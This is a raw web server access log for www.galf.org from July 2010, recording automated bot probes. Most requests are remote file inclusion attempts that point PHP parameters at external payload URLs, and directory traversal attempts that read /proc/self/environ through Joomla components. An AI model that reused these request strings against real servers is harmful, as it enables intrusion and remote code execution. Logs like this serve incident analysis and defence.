66.197.186.245 - - [25/Jul/2010:20:25:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:25:07 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:25:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:25:10 -0700] "GET /logs//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:25:10 -0700] "GET /include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:25:10 -0700] "GET /logs/access_091207.log%20%20//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:25:15 -0700] "GET /logs/access_091102.log%20%20//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:25:34 -0700] "GET /logs/access_100301.log%20%20//atom.php5?page=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:25:38 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:25:38 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:25:38 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:38 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:25:39 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:25:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:26:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:26:15 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:26:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:26:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:26:15 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:26:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:26:20 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:26:21 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:26:21 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:26:31 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:26:31 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:26:31 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:26:50 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:26:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:26:51 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:27:39 -0700] "GET /logs/access_100104.log//atom.php5?page=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:27:40 -0700] "GET /logs/access_100222.log//atom.php5?page=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:27:43 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:27:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:27:43 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:28:02 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:28:02 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:28:02 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:28:47 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:28:47 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:28:47 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:29:32 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:29:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:29:33 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:20:30:29 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:20:30:29 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:20:30:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:30:35 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:31:27 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:33:26 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:33:26 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:33:26 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:20:33:27 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:33:56 -0700] "GET /logs/access_090928.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.202.108.90 - - [25/Jul/2010:20:33:56 -0700] "GET /logs//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.202.108.90 - - [25/Jul/2010:20:33:56 -0700] "GET /include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.202.108.90 - - [25/Jul/2010:20:34:29 -0700] "GET /logs/access_100712.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:51 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:51 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:51 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:51 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:51 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:51 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:54 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:54 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:54 -0700] "GET /logs/access_100531.log//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:56 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:56 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:34:56 -0700] "GET /logs/access_100531.log//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:35:41 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:35:43 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:36:26 -0700] "GET /logs/access_090921.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:36:31 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
178.162.133.106 - - [25/Jul/2010:20:36:32 -0700] "GET /main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
178.162.133.106 - - [25/Jul/2010:20:36:32 -0700] "GET /logs/access_100201.log//main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
178.162.133.106 - - [25/Jul/2010:20:36:32 -0700] "GET /logs//main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.110.112.210 - - [25/Jul/2010:20:36:37 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
79.110.112.210 - - [25/Jul/2010:20:36:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
79.110.112.210 - - [25/Jul/2010:20:36:40 -0700] "POST /logs/contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:36:58 -0700] "GET /logs/access_091228.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:37:24 -0700] "GET /logs/access_100719.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:37:33 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:16 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:16 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:38:16 -0700] "GET /logs/access_100719.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:16 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:16 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:17 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:17 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:17 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:38:17 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
119.192.145.144 - - [25/Jul/2010:20:38:51 -0700] "GET /logs/access_100628.log%20%20/include/lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.192.145.144 - - [25/Jul/2010:20:38:52 -0700] "GET /include/lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.192.145.144 - - [25/Jul/2010:20:38:52 -0700] "GET /logs/include/lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:39:33 -0700] "POST /logs/access_091214.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:39:33 -0700] "POST /logs/access_091214.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:39:33 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:39:33 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:39:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:39:33 -0700] "POST /logs/access_091214.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:39:33 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:39:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:39:33 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:39:33 -0700] "POST /logs/access_091214.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
114.108.176.9 - - [25/Jul/2010:20:40:54 -0700] "GET /logs//main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.176.9 - - [25/Jul/2010:20:40:54 -0700] "GET /logs/access_100201.log//main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.176.9 - - [25/Jul/2010:20:40:54 -0700] "GET /main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.176.9 - - [25/Jul/2010:20:40:56 -0700] "GET /main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.176.9 - - [25/Jul/2010:20:40:57 -0700] "GET /logs/access_100201.log//main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.176.9 - - [25/Jul/2010:20:40:57 -0700] "GET /logs//main.php?appserv_root=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:41:47 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:41:47 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:41:51 -0700] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:41:53 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:41:53 -0700] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:41:53 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:42:03 -0700] "GET /logs/access_091012.log%20%20//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:42:03 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:42:03 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:42:52 -0700] "GET /logs/access_100531.log%20%20//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.192.145.144 - - [25/Jul/2010:20:42:56 -0700] "GET /logs/access_100628.log/include/lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.227.218.75 - - [25/Jul/2010:20:43:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:20:44:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.834" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:44:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.808" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:44:58 -0700] "GET /logs/access_091012.log%20%20//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
